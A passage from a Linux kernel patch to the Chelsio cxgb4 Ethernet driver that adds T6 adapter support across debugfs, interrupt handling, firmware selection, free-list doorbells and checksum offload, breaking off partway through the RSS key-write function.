Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 11 +- .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 180 +++++++++++---- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 47 +++- drivers/net/ethernet/chelsio/cxgb4/sge.c | 47 ++-- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 218 +++++++++++++----- drivers/net/ethernet/chelsio/cxgb4/t4_msg.h | 3 + drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 105 +++++++++ .../net/ethernet/chelsio/cxgb4/t4_values.h | 1 + drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h | 56 +++-- .../net/ethernet/chelsio/cxgb4/t4fw_version.h | 5 + 10 files changed, 524 insertions(+), 149 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 83773f3bf2e7..4d3a8c20eb12 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -224,7 +224,6 @@ struct sge_params { }; struct tp_params { - unsigned int ntxchan; /* # of Tx channels */ unsigned int tre; /* log2 of core clocks per TP tick */ unsigned int la_mask; /* what events are recorded by TP LA */ unsigned short tx_modq_map; /* TX modulation scheduler queue to */ @@ -297,6 +296,15 @@ struct devlog_params { u32 size; /* size of log */ }; +/* Stores chip specific parameters */ +struct arch_specific_params { + u8 nchan; + u16 mps_rplc_size; + u16 vfcount; + u32 sge_fl_db; + u16 mps_tcam_size; +}; + struct adapter_params { struct sge_params sge; struct tp_params tp; @@ -322,6 +330,7 @@ struct adapter_params { unsigned char nports; /* # of ethernet ports */ unsigned char portvec; enum chip_type chip; /* chip code */ + struct arch_specific_params arch; /* chip specific params */ unsigned char offload; unsigned char bypass; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 7cb423745974..3719807efddd 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1084,41 +1084,89 @@ static inline void tcamxy2valmask(u64 x, u64 y, u8 *addr, u64 *mask) static int mps_tcam_show(struct seq_file *seq, void *v) { - if (v == SEQ_START_TOKEN) - seq_puts(seq, "Idx Ethernet address Mask Vld Ports PF" - " VF Replication " - "P0 P1 P2 P3 ML\n"); - else { + struct adapter *adap = seq->private; + unsigned int chip_ver = CHELSIO_CHIP_VERSION(adap->params.chip); + + if (v == SEQ_START_TOKEN) { + if (adap->params.arch.mps_rplc_size > 128) + seq_puts(seq, "Idx Ethernet address Mask " + "Vld Ports PF VF " + "Replication " + " P0 P1 P2 P3 ML\n"); + else + seq_puts(seq, "Idx Ethernet address Mask " + "Vld Ports PF VF Replication" + " P0 P1 P2 P3 ML\n"); + } else { u64 mask; u8 addr[ETH_ALEN]; - struct adapter *adap = seq->private; + bool replicate; unsigned int idx = (uintptr_t)v - 2; - u64 tcamy = t4_read_reg64(adap, MPS_CLS_TCAM_Y_L(idx)); - u64 tcamx = t4_read_reg64(adap, MPS_CLS_TCAM_X_L(idx)); - u32 cls_lo = t4_read_reg(adap, MPS_CLS_SRAM_L(idx)); - u32 cls_hi = t4_read_reg(adap, MPS_CLS_SRAM_H(idx)); - u32 rplc[4] = {0, 0, 0, 0}; + u64 tcamy, tcamx, val; + u32 cls_lo, cls_hi, ctl; + u32 rplc[8] = {0}; + + if (chip_ver > CHELSIO_T5) { + /* CtlCmdType - 0: Read, 1: Write + * CtlTcamSel - 0: TCAM0, 1: TCAM1 + * CtlXYBitSel- 0: Y bit, 1: X bit + */ + + /* Read tcamy */ + ctl = CTLCMDTYPE_V(0) | CTLXYBITSEL_V(0); + if (idx < 256) + ctl |= CTLTCAMINDEX_V(idx) | CTLTCAMSEL_V(0); + else + ctl |= CTLTCAMINDEX_V(idx - 256) | + CTLTCAMSEL_V(1); + t4_write_reg(adap, MPS_CLS_TCAM_DATA2_CTL_A, ctl); + val = 
t4_read_reg(adap, MPS_CLS_TCAM_DATA1_A); + tcamy = DMACH_G(val) << 32; + tcamy |= t4_read_reg(adap, MPS_CLS_TCAM_DATA0_A); + + /* Read tcamx. Change the control param */ + ctl |= CTLXYBITSEL_V(1); + t4_write_reg(adap, MPS_CLS_TCAM_DATA2_CTL_A, ctl); + val = t4_read_reg(adap, MPS_CLS_TCAM_DATA1_A); + tcamx = DMACH_G(val) << 32; + tcamx |= t4_read_reg(adap, MPS_CLS_TCAM_DATA0_A); + } else { + tcamy = t4_read_reg64(adap, MPS_CLS_TCAM_Y_L(idx)); + tcamx = t4_read_reg64(adap, MPS_CLS_TCAM_X_L(idx)); + } + + cls_lo = t4_read_reg(adap, MPS_CLS_SRAM_L(idx)); + cls_hi = t4_read_reg(adap, MPS_CLS_SRAM_H(idx)); if (tcamx & tcamy) { seq_printf(seq, "%3u -\n", idx); goto out; } - if (cls_lo & REPLICATE_F) { + rplc[0] = rplc[1] = rplc[2] = rplc[3] = 0; + if (chip_ver > CHELSIO_T5) + replicate = (cls_lo & T6_REPLICATE_F); + else + replicate = (cls_lo & REPLICATE_F); + + if (replicate) { struct fw_ldst_cmd ldst_cmd; int ret; + struct fw_ldst_mps_rplc mps_rplc; + u32 ldst_addrspc; memset(&ldst_cmd, 0, sizeof(ldst_cmd)); + ldst_addrspc = + FW_LDST_CMD_ADDRSPACE_V(FW_LDST_ADDRSPC_MPS); ldst_cmd.op_to_addrspace = htonl(FW_CMD_OP_V(FW_LDST_CMD) | FW_CMD_REQUEST_F | FW_CMD_READ_F | - FW_LDST_CMD_ADDRSPACE_V( - FW_LDST_ADDRSPC_MPS)); + ldst_addrspc); ldst_cmd.cycles_to_len16 = htonl(FW_LEN16(ldst_cmd)); - ldst_cmd.u.mps.fid_ctl = + ldst_cmd.u.mps.rplc.fid_idx = htons(FW_LDST_CMD_FID_V(FW_LDST_MPS_RPLC) | - FW_LDST_CMD_CTL_V(idx)); + FW_LDST_CMD_IDX_V(idx)); ret = t4_wr_mbox(adap, adap->mbox, &ldst_cmd, sizeof(ldst_cmd), &ldst_cmd); if (ret) @@ -1126,30 +1174,69 @@ static int mps_tcam_show(struct seq_file *seq, void *v) "replication map for idx %d: %d\n", idx, -ret); else { - rplc[0] = ntohl(ldst_cmd.u.mps.rplc31_0); - rplc[1] = ntohl(ldst_cmd.u.mps.rplc63_32); - rplc[2] = ntohl(ldst_cmd.u.mps.rplc95_64); - rplc[3] = ntohl(ldst_cmd.u.mps.rplc127_96); + mps_rplc = ldst_cmd.u.mps.rplc; + rplc[0] = ntohl(mps_rplc.rplc31_0); + rplc[1] = ntohl(mps_rplc.rplc63_32); + rplc[2] = ntohl(mps_rplc.rplc95_64); + rplc[3] = ntohl(mps_rplc.rplc127_96); + if (adap->params.arch.mps_rplc_size > 128) { + rplc[4] = ntohl(mps_rplc.rplc159_128); + rplc[5] = ntohl(mps_rplc.rplc191_160); + rplc[6] = ntohl(mps_rplc.rplc223_192); + rplc[7] = ntohl(mps_rplc.rplc255_224); + } } } tcamxy2valmask(tcamx, tcamy, addr, &mask); - seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x %012llx" - "%3c %#x%4u%4d", - idx, addr[0], addr[1], addr[2], addr[3], addr[4], - addr[5], (unsigned long long)mask, - (cls_lo & SRAM_VLD_F) ? 'Y' : 'N', PORTMAP_G(cls_hi), - PF_G(cls_lo), - (cls_lo & VF_VALID_F) ? VF_G(cls_lo) : -1); - if (cls_lo & REPLICATE_F) - seq_printf(seq, " %08x %08x %08x %08x", - rplc[3], rplc[2], rplc[1], rplc[0]); + if (chip_ver > CHELSIO_T5) + seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x " + "%012llx%3c %#x%4u%4d", + idx, addr[0], addr[1], addr[2], addr[3], + addr[4], addr[5], (unsigned long long)mask, + (cls_lo & T6_SRAM_VLD_F) ? 'Y' : 'N', + PORTMAP_G(cls_hi), + T6_PF_G(cls_lo), + (cls_lo & T6_VF_VALID_F) ? + T6_VF_G(cls_lo) : -1); else - seq_printf(seq, "%36c", ' '); - seq_printf(seq, "%4u%3u%3u%3u %#x\n", - SRAM_PRIO0_G(cls_lo), SRAM_PRIO1_G(cls_lo), - SRAM_PRIO2_G(cls_lo), SRAM_PRIO3_G(cls_lo), - (cls_lo >> MULTILISTEN0_S) & 0xf); + seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x " + "%012llx%3c %#x%4u%4d", + idx, addr[0], addr[1], addr[2], addr[3], + addr[4], addr[5], (unsigned long long)mask, + (cls_lo & SRAM_VLD_F) ? 'Y' : 'N', + PORTMAP_G(cls_hi), + PF_G(cls_lo), + (cls_lo & VF_VALID_F) ? 
VF_G(cls_lo) : -1); + + if (replicate) { + if (adap->params.arch.mps_rplc_size > 128) + seq_printf(seq, " %08x %08x %08x %08x " + "%08x %08x %08x %08x", + rplc[7], rplc[6], rplc[5], rplc[4], + rplc[3], rplc[2], rplc[1], rplc[0]); + else + seq_printf(seq, " %08x %08x %08x %08x", + rplc[3], rplc[2], rplc[1], rplc[0]); + } else { + if (adap->params.arch.mps_rplc_size > 128) + seq_printf(seq, "%72c", ' '); + else + seq_printf(seq, "%36c", ' '); + } + + if (chip_ver > CHELSIO_T5) + seq_printf(seq, "%4u%3u%3u%3u %#x\n", + T6_SRAM_PRIO0_G(cls_lo), + T6_SRAM_PRIO1_G(cls_lo), + T6_SRAM_PRIO2_G(cls_lo), + T6_SRAM_PRIO3_G(cls_lo), + (cls_lo >> T6_MULTILISTEN0_S) & 0xf); + else + seq_printf(seq, "%4u%3u%3u%3u %#x\n", + SRAM_PRIO0_G(cls_lo), SRAM_PRIO1_G(cls_lo), + SRAM_PRIO2_G(cls_lo), SRAM_PRIO3_G(cls_lo), + (cls_lo >> MULTILISTEN0_S) & 0xf); } out: return 0; } @@ -1416,6 +1503,9 @@ static int rss_config_show(struct seq_file *seq, void *v) seq_printf(seq, " HashDelay: %3d\n", HASHDELAY_G(rssconf)); if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) seq_printf(seq, " VfWrAddr: %3d\n", VFWRADDR_G(rssconf)); + else + seq_printf(seq, " VfWrAddr: %3d\n", + T6_VFWRADDR_G(rssconf)); seq_printf(seq, " KeyMode: %s\n", keymode[KEYMODE_G(rssconf)]); seq_printf(seq, " VfWrEn: %3s\n", yesno(rssconf & VFWREN_F)); seq_printf(seq, " KeyWrEn: %3s\n", yesno(rssconf & KEYWREN_F)); @@ -1634,14 +1724,14 @@ static int rss_vf_config_open(struct inode *inode, struct file *file) struct adapter *adapter = inode->i_private; struct seq_tab *p; struct rss_vf_conf *vfconf; - int vf; + int vf, vfcount = adapter->params.arch.vfcount; - p = seq_open_tab(file, 128, sizeof(*vfconf), 1, rss_vf_config_show); + p = seq_open_tab(file, vfcount, sizeof(*vfconf), 1, rss_vf_config_show); if (!p) return -ENOMEM; vfconf = (struct rss_vf_conf *)p->data; - for (vf = 0; vf < 128; vf++) { + for (vf = 0; vf < vfcount; vf++) { t4_read_rss_vf_config(adapter, vf, &vfconf[vf].rss_vf_vfl, &vfconf[vf].rss_vf_vfh); } @@ -2033,7 +2123,7 @@ void add_debugfs_files(struct adapter *adap, int t4_setup_debugfs(struct adapter *adap) { int i; - u32 size; + u32 size = 0; struct dentry *de; static struct t4_debugfs_entry t4_debugfs_files[] = { @@ -2104,12 +2194,7 @@ int t4_setup_debugfs(struct adapter *adap) size = t4_read_reg(adap, MA_EDRAM1_BAR_A); add_debugfs_mem(adap, "edc1", MEM_EDC1, EDRAM1_SIZE_G(size)); } - if (is_t4(adap->params.chip)) { - size = t4_read_reg(adap, MA_EXT_MEMORY_BAR_A); - if (i & EXT_MEM_ENABLE_F) - add_debugfs_mem(adap, "mc", MEM_MC, - EXT_MEM_SIZE_G(size)); - } else { + if (is_t5(adap->params.chip)) { if (i & EXT_MEM0_ENABLE_F) { size = t4_read_reg(adap, MA_EXT_MEMORY0_BAR_A); add_debugfs_mem(adap, "mc0", MEM_MC0, @@ -2120,6 +2205,11 @@ int t4_setup_debugfs(struct adapter *adap) add_debugfs_mem(adap, "mc1", MEM_MC1, EXT_MEM1_SIZE_G(size)); } + } else { + if (i & EXT_MEM_ENABLE_F) + size = t4_read_reg(adap, MA_EXT_MEMORY_BAR_A); + add_debugfs_mem(adap, "mc", MEM_MC, + EXT_MEM_SIZE_G(size)); } de = debugfs_create_file_size("flash", S_IRUSR, adap->debugfs_root, adap, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 974b27ce6a70..a589591e5b63 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -135,8 +135,10 @@ struct filter_entry { #define FW4_FNAME "cxgb4/t4fw.bin" #define FW5_FNAME "cxgb4/t5fw.bin" +#define FW6_FNAME "cxgb4/t6fw.bin" #define FW4_CFNAME "cxgb4/t4-config.txt" #define FW5_CFNAME 
"cxgb4/t5-config.txt" +#define FW6_CFNAME "cxgb4/t6-config.txt" #define PHY_AQ1202_FIRMWARE "cxgb4/aq1202_fw.cld" #define PHY_BCM84834_FIRMWARE "cxgb4/bcm8483.bin" #define PHY_AQ1202_DEVICEID 0x4409 @@ -1721,7 +1723,7 @@ static int tid_init(struct tid_info *t) bitmap_zero(t->stid_bmap, t->nstids + t->nsftids); /* Reserve stid 0 for T4/T5 adapters */ if (!t->stid_base && - (is_t4(adap->params.chip) || is_t5(adap->params.chip))) + (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5)) __set_bit(0, t->stid_bmap); return 0; @@ -2108,10 +2110,7 @@ int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) if (offset < mc0_end) { memtype = MEM_MC0; memaddr = offset - edc1_end; - } else if (is_t4(adap->params.chip)) { - /* T4 only has a single memory channel */ - goto err; - } else { + } else if (is_t5(adap->params.chip)) { size = t4_read_reg(adap, MA_EXT_MEMORY1_BAR_A); mc1_size = EXT_MEM1_SIZE_G(size) << 20; mc1_end = mc0_end + mc1_size; @@ -2122,6 +2121,9 @@ int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) /* offset beyond the end of any memory */ goto err; } + } else { + /* T4/T6 only has a single memory channel */ + goto err; } } @@ -2286,9 +2288,13 @@ static void process_db_full(struct work_struct *work) drain_db_fifo(adap, dbfifo_drain_delay); enable_dbs(adap); notify_rdma_uld(adap, CXGB4_CONTROL_DB_EMPTY); - t4_set_reg_field(adap, SGE_INT_ENABLE3_A, - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F, - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F); + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + t4_set_reg_field(adap, SGE_INT_ENABLE3_A, + DBFIFO_HP_INT_F | DBFIFO_LP_INT_F, + DBFIFO_HP_INT_F | DBFIFO_LP_INT_F); + else + t4_set_reg_field(adap, SGE_INT_ENABLE3_A, + DBFIFO_LP_INT_F, DBFIFO_LP_INT_F); } static void sync_txq_pidx(struct adapter *adap, struct sge_txq *q) @@ -2350,7 +2356,7 @@ static void process_db_drop(struct work_struct *work) drain_db_fifo(adap, dbfifo_drain_delay); enable_dbs(adap); notify_rdma_uld(adap, CXGB4_CONTROL_DB_EMPTY); - } else { + } else if (is_t5(adap->params.chip)) { u32 dropped_db = t4_read_reg(adap, 0x010ac); u16 qid = (dropped_db >> 15) & 0x1ffff; u16 pidx_inc = dropped_db & 0x1fff; @@ -2371,7 +2377,8 @@ static void process_db_drop(struct work_struct *work) t4_set_reg_field(adap, 0x10b0, 1<<15, 1<<15); } - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, DROPPED_DB_F, 0); + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, DROPPED_DB_F, 0); } void t4_db_full(struct adapter *adap) @@ -3390,6 +3397,9 @@ static int adap_init0_config(struct adapter *adapter, int reset) case CHELSIO_T5: fw_config_file = FW5_CFNAME; break; + case CHELSIO_T6: + fw_config_file = FW6_CFNAME; + break; default: dev_err(adapter->pdev_dev, "Device %d is not supported\n", adapter->pdev->device); @@ -3586,7 +3596,24 @@ static struct fw_info fw_info_array[] = { .intfver_iscsi = FW_INTFVER(T5, ISCSI), .intfver_fcoe = FW_INTFVER(T5, FCOE), }, + }, { + .chip = CHELSIO_T6, + .fs_name = FW6_CFNAME, + .fw_mod_name = FW6_FNAME, + .fw_hdr = { + .chip = FW_HDR_CHIP_T6, + .fw_ver = __cpu_to_be32(FW_VERSION(T6)), + .intfver_nic = FW_INTFVER(T6, NIC), + .intfver_vnic = FW_INTFVER(T6, VNIC), + .intfver_ofld = FW_INTFVER(T6, OFLD), + .intfver_ri = FW_INTFVER(T6, RI), + .intfver_iscsipdu = FW_INTFVER(T6, ISCSIPDU), + .intfver_iscsi = FW_INTFVER(T6, ISCSI), + .intfver_fcoepdu = FW_INTFVER(T6, FCOEPDU), + .intfver_fcoe = FW_INTFVER(T6, FCOE), + }, } + }; static struct fw_info *find_fw_info(int chip) diff --git 
a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index f9c889e14634..6b7c37fd0252 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -522,14 +522,13 @@ static void unmap_rx_buf(struct adapter *adap, struct sge_fl *q) static inline void ring_fl_db(struct adapter *adap, struct sge_fl *q) { - u32 val; if (q->pend_cred >= 8) { + u32 val = adap->params.arch.sge_fl_db; + if (is_t4(adap->params.chip)) - val = PIDX_V(q->pend_cred / 8); + val |= PIDX_V(q->pend_cred / 8); else - val = PIDX_T5_V(q->pend_cred / 8) | - DBTYPE_F; - val |= DBPRIO_F; + val |= PIDX_T5_V(q->pend_cred / 8); /* Make sure all memory writes to the Free List queue are * committed before we tell the hardware about them. @@ -1034,7 +1033,7 @@ static void inline_tx_skb(const struct sk_buff *skb, const struct sge_txq *q, * Figure out what HW csum a packet wants and return the appropriate control * bits. */ -static u64 hwcsum(const struct sk_buff *skb) +static u64 hwcsum(enum chip_type chip, const struct sk_buff *skb) { int csum_type; const struct iphdr *iph = ip_hdr(skb); @@ -1065,11 +1064,16 @@ static u64 hwcsum(const struct sk_buff *skb) goto nocsum; } - if (likely(csum_type >= TX_CSUM_TCPIP)) - return TXPKT_CSUM_TYPE_V(csum_type) | - TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)) | - TXPKT_ETHHDR_LEN_V(skb_network_offset(skb) - ETH_HLEN); - else { + if (likely(csum_type >= TX_CSUM_TCPIP)) { + u64 hdr_len = TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)); + int eth_hdr_len = skb_network_offset(skb) - ETH_HLEN; + + if (CHELSIO_CHIP_VERSION(chip) <= CHELSIO_T5) + hdr_len |= TXPKT_ETHHDR_LEN_V(eth_hdr_len); + else + hdr_len |= T6_TXPKT_ETHHDR_LEN_V(eth_hdr_len); + return TXPKT_CSUM_TYPE_V(csum_type) | hdr_len; + } else { int start = skb_transport_offset(skb); return TXPKT_CSUM_TYPE_V(csum_type) | @@ -1237,9 +1241,15 @@ out_free: dev_kfree_skb_any(skb); else lso->c.len = htonl(LSO_T5_XFER_SIZE_V(skb->len)); cpl = (void *)(lso + 1); - cntrl = TXPKT_CSUM_TYPE_V(v6 ? TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | - TXPKT_IPHDR_LEN_V(l3hdr_len) | - TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + cntrl = TXPKT_ETHHDR_LEN_V(eth_xtra_len); + else + cntrl = T6_TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + cntrl |= TXPKT_CSUM_TYPE_V(v6 ? + TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | + TXPKT_IPHDR_LEN_V(l3hdr_len); q->tso++; q->tx_cso += ssi->gso_segs; } else { @@ -1248,7 +1258,8 @@ out_free: dev_kfree_skb_any(skb); FW_WR_IMMDLEN_V(len)); cpl = (void *)(wr + 1); if (skb->ip_summed == CHECKSUM_PARTIAL) { - cntrl = hwcsum(skb) | TXPKT_IPCSUM_DIS_F; + cntrl = hwcsum(adap->params.chip, skb) | + TXPKT_IPCSUM_DIS_F; q->tx_cso++; } } @@ -2440,6 +2451,8 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, c.iqns_to_fl0congen = htonl(FW_IQ_CMD_IQFLINTCONGEN_F); if (fl) { + enum chip_type chip = CHELSIO_CHIP_VERSION(adap->params.chip); + /* Allocate the ring for the hardware free list (with space * for its status page) along with the associated software * descriptor ring. The free list size needs to be a multiple @@ -2468,7 +2481,9 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, FW_IQ_CMD_FL0CONGEN_F); c.fl0dcaen_to_fl0cidxfthresh = htons(FW_IQ_CMD_FL0FBMIN_V(FETCHBURSTMIN_64B_X) | - FW_IQ_CMD_FL0FBMAX_V(FETCHBURSTMAX_512B_X)); + FW_IQ_CMD_FL0FBMAX_V((chip <= CHELSIO_T5) ? 
+ FETCHBURSTMAX_512B_X : + FETCHBURSTMAX_256B_X)); c.fl0size = htons(flsz); c.fl0addr = cpu_to_be64(fl->addr); } diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e9ccfeb4ec03..35a44db29347 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -150,7 +150,12 @@ void t4_write_indirect(struct adapter *adap, unsigned int addr_reg, */ void t4_hw_pci_read_cfg4(struct adapter *adap, int reg, u32 *val) { - u32 req = ENABLE_F | FUNCTION_V(adap->pf) | REGISTER_V(reg); + u32 req = FUNCTION_V(adap->pf) | REGISTER_V(reg); + + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + req |= ENABLE_F; + else + req |= T6_ENABLE_F; if (is_t4(adap->params.chip)) req |= LOCALCFG_F; @@ -381,9 +386,8 @@ int t4_memory_rw(struct adapter *adap, int win, int mtype, u32 addr, /* Offset into the region of memory which is being accessed * MEM_EDC0 = 0 * MEM_EDC1 = 1 - * MEM_MC = 2 -- T4 - * MEM_MC0 = 2 -- For T5 - * MEM_MC1 = 3 -- For T5 + * MEM_MC = 2 -- MEM_MC for chips with only 1 memory controller + * MEM_MC1 = 3 -- for chips with 2 memory controllers (e.g. T5) */ edc_size = EDRAM0_SIZE_G(t4_read_reg(adap, MA_EDRAM0_BAR_A)); if (mtype != MEM_MC1) @@ -2292,7 +2296,8 @@ static bool t4_fw_matches_chip(const struct adapter *adap, * which will keep us "honest" in the future ... */ if ((is_t4(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T4) || - (is_t5(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T5)) + (is_t5(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T5) || + (is_t6(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T6)) return true; dev_err(adap->pdev_dev, @@ -2832,6 +2837,7 @@ static void tp_intr_handler(struct adapter *adapter) static void sge_intr_handler(struct adapter *adapter) { u64 v; + u32 err; static const struct intr_info sge_intr_info[] = { { ERR_CPL_EXCEED_IQE_SIZE_F, @@ -2840,8 +2846,6 @@ static void sge_intr_handler(struct adapter *adapter) "SGE GTS CIDX increment too large", -1, 0 }, { ERR_CPL_OPCODE_0_F, "SGE received 0-length CPL", -1, 0 }, { DBFIFO_LP_INT_F, NULL, -1, 0, t4_db_full }, - { DBFIFO_HP_INT_F, NULL, -1, 0, t4_db_full }, - { ERR_DROPPED_DB_F, NULL, -1, 0, t4_db_dropped }, { ERR_DATA_CPL_ON_HIGH_QID1_F | ERR_DATA_CPL_ON_HIGH_QID0_F, "SGE IQID > 1023 received CPL for FL", -1, 0 }, { ERR_BAD_DB_PIDX3_F, "SGE DBP 3 pidx increment too large", -1, @@ -2854,13 +2858,19 @@ static void sge_intr_handler(struct adapter *adapter) 0 }, { ERR_ING_CTXT_PRIO_F, "SGE too many priority ingress contexts", -1, 0 }, - { ERR_EGR_CTXT_PRIO_F, - "SGE too many priority egress contexts", -1, 0 }, { INGRESS_SIZE_ERR_F, "SGE illegal ingress QID", -1, 0 }, { EGRESS_SIZE_ERR_F, "SGE illegal egress QID", -1, 0 }, { 0 } }; + static struct intr_info t4t5_sge_intr_info[] = { + { ERR_DROPPED_DB_F, NULL, -1, 0, t4_db_dropped }, + { DBFIFO_HP_INT_F, NULL, -1, 0, t4_db_full }, + { ERR_EGR_CTXT_PRIO_F, + "SGE too many priority egress contexts", -1, 0 }, + { 0 } + }; + v = (u64)t4_read_reg(adapter, SGE_INT_CAUSE1_A) | ((u64)t4_read_reg(adapter, SGE_INT_CAUSE2_A) << 32); if (v) { @@ -2870,8 +2880,23 @@ static void sge_intr_handler(struct adapter *adapter) t4_write_reg(adapter, SGE_INT_CAUSE2_A, v >> 32); } - if (t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, sge_intr_info) || - v != 0) + v |= t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, sge_intr_info); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + v |= t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, + t4t5_sge_intr_info); + + err = 
t4_read_reg(adapter, SGE_ERROR_STATS_A); + if (err & ERROR_QID_VALID_F) { + dev_err(adapter->pdev_dev, "SGE error for queue %u\n", + ERROR_QID_G(err)); + if (err & UNCAPTURED_ERROR_F) + dev_err(adapter->pdev_dev, + "SGE UNCAPTURED_ERROR set (clearing)\n"); + t4_write_reg(adapter, SGE_ERROR_STATS_A, ERROR_QID_VALID_F | + UNCAPTURED_ERROR_F); + } + + if (v != 0) t4_fatal_err(adapter); } @@ -3044,6 +3069,7 @@ static void cplsw_intr_handler(struct adapter *adapter) */ static void le_intr_handler(struct adapter *adap) { + enum chip_type chip = CHELSIO_CHIP_VERSION(adap->params.chip); static const struct intr_info le_intr_info[] = { { LIPMISS_F, "LE LIP miss", -1, 0 }, { LIP0_F, "LE 0 LIP error", -1, 0 }, @@ -3053,7 +3079,18 @@ static void le_intr_handler(struct adapter *adap) { 0 } }; - if (t4_handle_intr_status(adap, LE_DB_INT_CAUSE_A, le_intr_info)) + static struct intr_info t6_le_intr_info[] = { + { T6_LIPMISS_F, "LE LIP miss", -1, 0 }, + { T6_LIP0_F, "LE 0 LIP error", -1, 0 }, + { TCAMINTPERR_F, "LE parity error", -1, 1 }, + { T6_UNKNOWNCMD_F, "LE unknown command", -1, 1 }, + { SSRAMINTPERR_F, "LE request queue parity error", -1, 1 }, + { 0 } + }; + + if (t4_handle_intr_status(adap, LE_DB_INT_CAUSE_A, + (chip <= CHELSIO_T5) ? + le_intr_info : t6_le_intr_info)) t4_fatal_err(adap); } @@ -3322,7 +3359,7 @@ int t4_slow_intr_handler(struct adapter *adapter) pcie_intr_handler(adapter); if (cause & MC_F) mem_intr_handler(adapter, MEM_MC); - if (!is_t4(adapter->params.chip) && (cause & MC1_S)) + if (is_t5(adapter->params.chip) && (cause & MC1_F)) mem_intr_handler(adapter, MEM_MC1); if (cause & EDC0_F) mem_intr_handler(adapter, MEM_EDC0); @@ -3368,17 +3405,18 @@ int t4_slow_intr_handler(struct adapter *adapter) */ void t4_intr_enable(struct adapter *adapter) { + u32 val = 0; u32 pf = SOURCEPF_G(t4_read_reg(adapter, PL_WHOAMI_A)); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + val = ERR_DROPPED_DB_F | ERR_EGR_CTXT_PRIO_F | DBFIFO_HP_INT_F; t4_write_reg(adapter, SGE_INT_ENABLE3_A, ERR_CPL_EXCEED_IQE_SIZE_F | ERR_INVALID_CIDX_INC_F | ERR_CPL_OPCODE_0_F | - ERR_DROPPED_DB_F | ERR_DATA_CPL_ON_HIGH_QID1_F | + ERR_DATA_CPL_ON_HIGH_QID1_F | INGRESS_SIZE_ERR_F | ERR_DATA_CPL_ON_HIGH_QID0_F | ERR_BAD_DB_PIDX3_F | ERR_BAD_DB_PIDX2_F | ERR_BAD_DB_PIDX1_F | ERR_BAD_DB_PIDX0_F | ERR_ING_CTXT_PRIO_F | - ERR_EGR_CTXT_PRIO_F | INGRESS_SIZE_ERR_F | - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F | - EGRESS_SIZE_ERR_F); + DBFIFO_LP_INT_F | EGRESS_SIZE_ERR_F | val); t4_write_reg(adapter, MYPF_REG(PL_PF_INT_ENABLE_A), PF_INTR_MASK); t4_set_reg_field(adapter, PL_INT_MAP0_A, 0, 1 << pf); } @@ -3592,11 +3630,29 @@ void t4_read_rss_key(struct adapter *adap, u32 *key) */ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) { + u8 rss_key_addr_cnt = 16; + u32 vrt = t4_read_reg(adap, TP_RSS_CONFIG_VRT_A); + + /* T6 and later: for KeyMode 3 (per-vf and per-vf scramble), + * allows access to key addresses 16-63 by using KeyWrAddrX + * as index[5:4](upper 2) into key table + */ + if 